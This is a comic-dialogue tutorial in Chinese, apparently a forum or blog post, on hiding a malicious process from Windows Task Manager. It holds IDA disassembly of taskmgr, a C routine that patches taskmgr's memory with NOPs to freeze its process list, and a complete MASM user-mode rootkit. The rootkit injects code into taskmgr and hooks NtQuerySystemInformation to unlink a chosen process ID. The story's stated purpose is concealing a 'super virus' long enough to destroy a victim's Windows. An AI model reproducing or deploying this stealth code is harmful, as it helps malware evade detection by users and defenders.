[原创]反汇编之一:和Taskmgr过不去篇(无厘头版)
原文链接:和Taskmgr过不去篇(无厘头版)
Hook入门级文章,主要想培养一下偶写文章的感觉,老鸟无视…我想看看技术文章能不能无厘头的写,如果效果不错的话,准备更上一层-----用我的原创漫画表达。:)
(警告1:文章中有部分“限制级”词语,请11岁以下弟弟妹妹误入)
(警告2: 修正警告1,不是“误入”,是“勿入”哦,我没有做暗示哦…)
时间: 终结者2018年
场景: 地下泡泡澡堂
故事: 纯属虚构
在一场残酷的西红柿大战后,最终邪恶阿宝使用卑鄙无耻的招数轻松战胜了单纯的加菲,于是哥俩一起去地下废墟澡堂泡澡。在沉默了一阵之后加菲忽然问了阿宝
一个恐怖的问题……
加菲:……你说我们俩身上的毛哪个值钱…
阿宝:%##$%@#$%#@%#@,你想钱想疯啦……
加菲:最近手头比较紧,有没有活接?
阿宝:嘿嘿……搞定一个任务,钞票大大滴。
加菲(口水状):什么呀?
阿宝:老比最近打麻将输我200多,赖账不肯还……
加菲:不会吧…人家是首富哦…
阿宝:没办法呀,windows赔老喽,我准备把他的命根子毁了……
加菲:你这个流氓,我不跟你玩了…
阿宝:什么啊!我指的是他的windows,你想哪去了…
加菲(迅速岔开话题):今天晚上太阳好亮哦…
阿宝(画外音):#@$%#@%,我们俩到底谁邪恶…
加菲:怎么毁呀?
阿宝:我搞了一个宇宙超级大病毒程序,只要运行30分钟保准他的命根子玩蛋! 只要30分钟内不被windows taskmgr发现…
加菲:你傻啊?人家不会用其他进程查看工具嘛?
阿宝:说你不懂了吧,老比乱搞垄断,windows和taskmgr捆死了,其他 进程工具没法运行呀,嘿嘿…自掘死路…
加菲:这还不简单,做个rootkit在内核层把病毒进程隐藏起来不就行了。
阿宝:进不去RING0,只能在用户层搞……,有没有其他办法…
加菲:你超级病毒都能写出来,这个不会写?????
阿宝(-_-b):少废话,你要不要钞票了…
加菲:这个… 一炷香的功夫过去了…
阿宝:你到底想好了没啊?
加菲:taskmgr显示进程信息的控件是SysListView32,我想可以截获显示每一行 的消息,然后忽略显示病毒进程的那一条消息…
阿宝:好啊…做一个dll植入taskmgr,然后SysListView32子类化到dll中的一个 消息处理函数,过滤特定进程的消息…
加菲:没成功…可以截获和过滤消息,但显示老是会多出来一行…(可能是我 实现方法有问题,请看我以前发布的程序)
阿宝:那怎么办啊? 加菲:要不然这样,做一个进程文本修改器,类似游戏修改器中的自动修改变量, 只不过这个变量是一个进程名,只要找到病毒进程名字的文本,就将成其他混淆视 听的名字(svchost.exe)。
阿宝:8错,查找时要注意同时修改UNICODE的字符串哦…
加菲:成功了,因为两个进程同时要写一个内容,所以极少数时间里可能会造成 病毒进程名漏出马脚…
阿宝:嗯…病毒名有时会闪一下…进程数还是增加了…能不能干脆彻底删除这个 进程名而不是将其改成其他名字呢?
加菲:这个… 阿宝(舔和路雪冰淇淋):搞得怎么样了,有什么新花样呢?
加菲:如果你的超级病毒运行之后,就不准taskmgr 运行起来,如果已经运行起来 就将其关掉…
阿宝:这个不行,太招人显眼了…
加菲:把taskmgr僵掉…
阿宝:你以为你是林正英啊???怎么僵呢???
加菲:我刚才没事用IDA玩了一下taskmgr的body,发现一个好玩的
UpdateProcInfoArray过程哦,上代码(省略无关部分):
1 public: long __thiscall CProcPage::UpdateProcInfoArray(void) proc near
2 mov eax, dword_1016580
3 .text:0100CAD5 shr eax, 0Ah
4 .text:0100CAD8 mov ecx, eax
5 .text:0100CADA imul ecx, [ebp+var_1FC]
6 .text:0100CAE1 mov [ebp+var_88], ecx
7 .text:0100CAE7 mov ecx, eax
8 .text:0100CAE9 imul ecx, [ebp+var_1F8]
9 .text:0100CAF0 mov edx, eax
10 .text:0100CAF2 imul edx, [ebp+var_1F0]
11 .text:0100CAF9 mov [ebp+var_74], ecx
12 .text:0100CAFC mov ecx, eax
13 .text:0100CAFE imul ecx, [ebp+var_1F4]
14 .text:0100CB05 mov [ebp+var_6C], edx
15 .text:0100CB08 mov edx, eax
16 .text:0100CB0A imul eax, [ebp+var_1B4]
17 .text:0100CB11 imul edx, [ebp+var_1B8]
18 .text:0100CB18 mov [ebp+var_7C], eax
19 .text:0100CB1B add eax, edx
20 .text:0100CB1D push edi
21 .text:0100CB1E mov [ebp+var_78], eax
22 .text:0100CB21 push 24h
23 .text:0100CB23 lea eax, [ebp+var_F0]
24 .text:0100CB29 push eax
25 .text:0100CB2A push 15h
26 .text:0100CB2C mov [ebp+var_70], ecx
27 .text:0100CB2F mov [ebp+var_80], edx
28 .text:0100CB32 mov __int64 g_MEMMax, ecx
29 .text:0100CB38 mov dword_1016564, edi
30 .text:0100CB3E call esi ; NtQuerySystemInformation(x,x,x,x)
31 .text:0100CB40 test eax, eax
32 .text:0100CB42 jge short loc_100CB4E
33 .text:0100CB42
34 .text:0100CB44
35 .text:0100CB44 loc_100CB44: ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+4Bj
36 .text:0100CB44 ; CProcPage::UpdateProcInfoArray(void)+7Aj
37 .text:0100CB44 mov eax, 80004005h
38 .text:0100CB49 jmp loc_100CE7E
39 .text:0100CB49
40 .text:0100CB4E ; ---------------------------------------------------------------------------
41 .text:0100CB4E
42 .text:0100CB4E loc_100CB4E: ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+EEj
43 .text:0100CB4E mov eax, dword_1016580
44 .text:0100CB53 shr eax, 0Ah
45 .text:0100CB56 imul eax, [ebp+var_DC]
46 .text:0100CB5D mov ecx, ebx
47 .text:0100CB5F mov [ebp+var_84], eax
48 .text:0100CB65 call CProcPage::GetProcessInfo(void)
49 .text:0100CB65
50 .text:0100CB6A cmp eax, edi
51 .text:0100CB6C mov [ebp+var_58], eax
52 .text:0100CB6F jl loc_100CE64
53 .text:0100CB6F
54 .text:0100CB75 mov [ebp+var_48], edi
55 .text:0100CB75
56 .text:0100CB78
57 .text:0100CB78 loc_100CB78: ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+1EEj
58 .text:0100CB78 mov esi, [ebx+10h]
59 .text:0100CB7B add esi, [ebp+var_48]
60 .text:0100CB7E mov eax, [esi+44h]
61 .text:0100CB81 cmp eax, edi
62 .text:0100CB83 jnz short loc_100CB8E
63 .text:0100CB83
64 .text:0100CB85 cmp [esi+4], edi
65 .text:0100CB88 jz loc_100CC1D
加菲:注意 call CProcPage::GetProcessInfo(void) 这一行,进去看看:
1 public: long __thiscall CProcPage::GetProcessInfo(void) proc near
2 .text:0100A6AF ; CODE XREF: CProcPage::UpdateProcInfoArray(void)+111p
3 .text:0100A6AF
4 .text:0100A6AF var_4 = dword ptr -4
5 .text:0100A6AF
6 .text:0100A6AF mov edi, edi
7 .text:0100A6B1 push ebp
8 .text:0100A6B2 mov ebp, esp
9 .text:0100A6B4 push ecx
10 .text:0100A6B5 push ebx
11 .text:0100A6B6 push esi
12 .text:0100A6B7 xor ebx, ebx
13 .text:0100A6B9 push edi
14 .text:0100A6BA mov edi, ds:GetProcessHeap()
15 .text:0100A6C0 mov esi, ecx
16 .text:0100A6C2 mov [ebp+var_4], ebx
17 .text:0100A6C2
18 .text:0100A6C5
19 .text:0100A6C5 loc_100A6C5: ; CODE XREF: CProcPage::GetProcessInfo(void)+63j
20 .text:0100A6C5 mov eax, [esi+10h]
21 .text:0100A6C8 cmp eax, ebx
22 .text:0100A6CA jz short loc_100A6F9
23 .text:0100A6CA
24 .text:0100A6CC push ebx
25 .text:0100A6CD push dword ptr [esi+14h]
26 .text:0100A6D0 push eax
27 .text:0100A6D1 push 5
28 .text:0100A6D3 call ds:NtQuerySystemInformation(x,x,x,x)
29 .text:0100A6D9 cmp eax, ebx
30 .text:0100A6DB jge short loc_100A71B
31 .text:0100A6DB
32 .text:0100A6DD cmp eax, 0C0000004h
33 .text:0100A6E2 jnz short loc_100A723
34 .text:0100A6E2
35 .text:0100A6E4 mov eax, [esi+10h]
36 .text:0100A6E7 cmp eax, ebx
37 .text:0100A6E9 jz short loc_100A6F9
38 .text:0100A6E9
39 .text:0100A6EB push eax ; lpMem
40 .text:0100A6EC push ebx ; dwFlags
41 .text:0100A6ED call edi ; GetProcessHeap()
42 .text:0100A6EF push eax ; hHeap
43 .text:0100A6F0 call ds:HeapFree(x,x,x)
44 .text:0100A6F6 mov [esi+10h], ebx
45 .text:0100A6F6
46 .text:0100A6F9
47 .text:0100A6F9 loc_100A6F9: ; CODE XREF: CProcPage::GetProcessInfo(void)+1Bj
48 .text:0100A6F9 ; CProcPage::GetProcessInfo(void)+3Aj
49 .text:0100A6F9 add dword ptr [esi+14h], 1000h
50 .text:0100A700 push dword ptr [esi+14h] ; dwBytes
51 .text:0100A703 push ebx ; dwFlags
52 .text:0100A704 call edi ; GetProcessHeap()
53 .text:0100A706 push eax ; hHeap
54 .text:0100A707 call ds:HeapAlloc(x,x,x)
55 .text:0100A70D cmp eax, ebx
56 .text:0100A70F mov [esi+10h], eax
57 .text:0100A712 jnz short loc_100A6C5
58 .text:0100A712
59 .text:0100A714 mov [ebp+var_4], 8007000Eh
60 .text:0100A714
61 .text:0100A71B
62 .text:0100A71B loc_100A71B: ; CODE XREF: CProcPage::GetProcessInfo(void)+2Cj
63 .text:0100A71B ; CProcPage::GetProcessInfo(void)+7Bj
64 .text:0100A71B mov eax, [ebp+var_4]
65 .text:0100A71E pop edi
66 .text:0100A71F pop esi
67 .text:0100A720 pop ebx
68 .text:0100A721 leave
69 .text:0100A722 retn
阿宝:喔欧...(移动广告:3G时代...就说喔欧),这个比较明显了,里面调用 了原生态API NtQuerySystemInformation(x,x,x,x)...
加菲:下面偶来写一个过程让taskmgr僵住:
1 #define MAGIC_ADDR 0x100cb65
2 static const byte VerFlag[] = {0xe8,0x45,0xdb,0xff,0xff};
3 bool stoptm(DWORD pid)
4 {
5 bool bSuccess = false;
6 HANDLE ph = 0;
7
8 if(!pid)
9 {
10 puts("taskmgr not run!");
11 goto QUIT;
12 }
13
14 ph = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
15 if(!ph)
16 {
17 puts("can't open taskmgr!");
18 goto QUIT;
19 }
20
21 byte fixbin[sizeof(VerFlag)];
22 if(!ReadProcessMemory(ph,(LPCVOID)MAGIC_ADDR,fixbin,sizeof(fixbin),NULL))
23 {
24 puts("read mem failed!");
25 goto QUIT;
26 }
27
28 if(memcmp(VerFlag,fixbin,sizeof(fixbin)))
29 {
30 puts("taskmgr isn't right ver!");
31 goto QUIT;
32 }
33
34 memset(fixbin,0x90,sizeof(fixbin));
35 if(!WriteProcessMemory(ph,(LPVOID)MAGIC_ADDR,fixbin,sizeof(fixbin),NULL))
36 {
37 puts("write mem failed!");
38 goto QUIT;
39 }
40
41 bSuccess = true;
42 QUIT:
43 if(ph)
44 CloseHandle(ph);
45 return bSuccess;
46 }
阿宝:我好像能看懂了,将对应的调用语句NOP掉,从而taskmgr无法再刷新 进程列表了...但这个不能对应不同版本的taskmgr吧?
加菲:这个...那是当然...
阿宝:你能不能给我个最终解决办法啊...
加菲:没办法了...只有用各个版本通杀技了,HOOk NtQuerySystemInformation , 然后改变其返回内容。要注意的是我们只需要HOOK 第一个参数为5的调用, 即Query系统进程信息,其他都不用理会。NtQuerySystemInformation 获取进程信息如果成功,将会返回一个数组,或者称其为一个链表更准确。结构如下:
1 typedef struct _SYSTEM_PROCESSES
2 {
3 ULONG NextEntryDelta; //构成结构序列的偏移量;
4 ULONG ThreadCount; //线程数目;
5 ULONG Reserved1[6];
6 LARGE_INTEGER CreateTime; //创建时间;
7 LARGE_INTEGER UserTime; //用户模式(Ring 3)的CPU时间;
8 LARGE_INTEGER KernelTime; //内核模式(Ring 0)的CPU时间;
9 UNICODE_STRING ProcessName; //进程名称;
10 KPRIORITY BasePriority; //进程优先权;
11 ULONG ProcessId; //进程标识符;
12 ULONG InheritedFromProcessId; //父进程的标识符;
13 ULONG HandleCount; //句柄数目;
14 ULONG Reserved2[2];
15 VM_COUNTERS VmCounters; //虚拟存储器的结构,见下;
16 IO_COUNTERS IoCounters; //IO计数结构,见下;
17 SYSTEM_THREADS Threads[1]; //进程相关线程的结构数组,见下;
18 }SYSTEM_PROCESSES,*PSYSTEM_PROCESSES;
19
加菲:我要做的只是在链表中查找需要隐藏进程的ID,然后将其剔除即可。
阿宝:怎么剔除呢?
加菲:分2种情况,若PID出现在链表的的尾部则直接将上一个链表指向NULL, 否则需要将上一个结构的指针指向PID结构后面一个结构,从而将其剔除,完整代码如下:
1 .386
2 .model flat, stdcall
3 option casemap:none
4 .nocref
5 .nolist
6 include D:/work/masm32/include/windows.inc
7 include D:/work/masm32/include/user32.inc
8 include D:/work/masm32/include/kernel32.inc
9 .list
10 .listmacro
11 .listmacroall
12 IFNDEF UNICODE_STRING
13 UNICODE_STRING struct
14 _Length WORD ?
15 MaximumLength WORD ?
16 Buffer PWSTR ?
17 UNICODE_STRING ends
18 PUNICODE_STRING typedef ptr UNICODE_STRING
19 ENDIF
20 SPI struct
21 NextOffset DWORD ?
22 DWORD ?
23 Times QWORD 6 dup(?)
24 ImageName UNICODE_STRING <?>
25 DWORD ?
26 ProcessId DWORD ?
27 Reserved DWORD 7 dup(?)
28 SPI ends
29 PSPI typedef ptr SPI
30 .const
31 szDll db "ntdll.dll",0
32 szQSI_func db "NtQuerySystemInformation",0
33 .code
34 ;**********************************************************
35 RT_BIN_START equ $
36 PID DWORD ? ;要隐藏进程的pid
37 pQSI_func DWORD ?
38 pQSI_Next DWORD ?
39 pBuf DWORD ?
40 pRetAddr DWORD ?
41 pPreviousSPI PSPI 0
42 dwEBX DWORD ?
43 ;ORGBIN byte 5 dup(?)
44 FIXBIN byte 5 dup(?)
45 RT_CODE_OFFSET equ $ - RT_BIN_START
46 len0 textequ %RT_CODE_OFFSET
47 % echo RT_CODE_OFFSET is len0
48 ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
49 myQSI_func proc
50 mov ecx,ebx
51 call @F
52 @@:
53 pop ebx
54 sub ebx,offset @B
55 jmp DOIT
56 GoMaMa:
57 mov eax,dword ptr [esp]
58 mov dword ptr [esp + 4],eax
59 pop eax
60 ORGBIN byte 5 dup(?)
61 jmp [ebx + pQSI_Next]
62 DOIT:
63 mov dword ptr [ebx + dwEBX],ecx
64 mov dword ptr [ebx + pBuf],0
65 push dword ptr [esp]
66 pop dword ptr [ebx + pRetAddr]
67 .if dword ptr [esp + 4] == 5
68 push dword ptr [esp+8]
69 pop dword ptr [ebx + pBuf]
70 .endif
71
72 call GoMaMa
73 ;调用原始QSI成功且是获取SPIs的调用
74 .if eax == 0 && dword ptr [ebx + pBuf] != 0
75 assume eax:PSPI
76 mov ecx,dword ptr [ebx + PID]
77 mov eax,dword ptr [ebx + pBuf]
78 .while TRUE
79 .if [eax].ProcessId == ecx
80 .if [eax].NextOffset == 0
81 mov eax,[ebx + pPreviousSPI]
82 mov [eax].NextOffset,0
83 .else
84 mov ecx,[eax].NextOffset
85 mov eax,[ebx + pPreviousSPI]
86 add ecx,[eax].NextOffset
87 mov [eax].NextOffset,ecx
88 .endif
89 .break
90 .endif
91 .break .if [eax].NextOffset == 0
92 push eax
93 pop dword ptr [ebx + pPreviousSPI]
94 add eax,[eax].NextOffset
95 .endw
96 assume eax:nothing
97 .endif
98
99 mov ecx,ebx
100 mov ebx,[ebx + dwEBX]
101 jmp [ecx + pRetAddr]
102 ;ret
103 myQSI_func endp
104 ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
105 RT_BIN_END equ $
106 RT_BIN_LEN equ RT_BIN_END - RT_BIN_START
107 T_BIN_LEN textequ %RT_BIN_LEN
108 % echo RT_BIN_LEN is T_BIN_LEN
109 ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
110 hookQSIfunc proc C uses ebx edi esi ph:HANDLE,pid:DWORD
111 local bSuccess,pRTBin,oldProtect
112
113 mov bSuccess,FALSE
114 .if pid == 0
115 jmp QUIT
116 .endif
117 invoke VirtualProtect,offset RT_BIN_START,/
118 T_BIN_LEN,PAGE_EXECUTE_READWRITE,/
119 addr oldProtect
120 .if !eax
121 jmp QUIT
122 .endif
123 invoke LoadLibrary,addr szDll
124 invoke GetProcAddress,eax,addr szQSI_func
125 .if !eax
126 jmp QUIT
127 .endif
128 mov pQSI_func,eax
129
130 invoke VirtualAllocEx,ph,NULL,T_BIN_LEN,/
131 MEM_COMMIT,PAGE_EXECUTE_READWRITE
132 .if !eax
133 jmp QUIT
134 .endif
135 mov pRTBin,eax
136
137 invoke ReadProcessMemory,ph,pQSI_func,/
138 addr ORGBIN,5,NULL
139 .if !eax
140 jmp QUIT
141 .endif
142 mov eax,pRTBin
143 add eax,RT_CODE_OFFSET
144 sub eax,pQSI_func
145 sub eax,5
146 mov byte ptr [FIXBIN],0E9h
147 mov dword ptr [FIXBIN+1],eax
148
149 mov eax,pQSI_func
150 add eax,5
151 mov pQSI_Next,eax
152 push pid
153 pop PID
154 invoke WriteProcessMemory,ph,pRTBin,/
155 offset RT_BIN_START,T_BIN_LEN,NULL
156 .if !eax
157 jmp QUIT
158 .endif
159 invoke WriteProcessMemory,ph,pQSI_func,/
160 addr FIXBIN,5,NULL
161 .if !eax
162 jmp QUIT
163 .endif
164
165 mov bSuccess,TRUE
166 QUIT:
167 .if pRTBin
168 ;invoke VirtualFreeEx,ph,pRTBin,/
169 ;T_BIN_LEN,MEM_RELEASE
170 .endif
171 mov eax,bSuccess
172 ret
173 hookQSIfunc endp
174 ;**********************************************************
175 end
阿宝:你好像是HOOK之后,直接将以上代码拷贝到taskmgr.exe进程空间中, 等待其自动调用,是吗?
加菲:没错,拷贝功能的函数即是hookQSIfunc,当然这要首先保证taskmgr在运行:
1 //检查taskmgr.exe当前是否在运行
2 DWORD findtm(void)
3 {
4 DWORD pid = 0;
5
6 PROCESSENTRY32 process = {.dwSize=sizeof(PROCESSENTRY32)};
7 HANDLE hss = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
8 Process32First(hss,&process);
9 while(Process32Next(hss,&process))
10 {
11 if(!strcmp(process.szExeFile,"taskmgr.exe"))
12 {
13 pid = process.th32ProcessID;
14 break;
15 }
16 }
17
18 CloseHandle(hss);
19 return pid;
20 }
阿宝(暗笑):是这样啊...嘿嘿
加菲(聚精会神地):这样一来无论哪个版本的taskmgr,只要获取机制没有变, 都可以搞定了,呵呵...终于搞定了...那个报酬怎么算...(回头),人呢???
阿宝(全裸速逃中...)
加菲:阿宝,你竟然敢欺骗偶的感情....
愤怒的加菲制造了N个加菲猫终结者T1300型追杀阿宝,至于阿宝能否逃脱,这就是另一个故事了哦 :)
(PS1:使用了电影分镜头剧本结构,适合改编为cartoon或flash之类的咚咚,结尾不是很好,修改中)
(PS2: 场景的选择是从刚看完的终结者2018获得的。)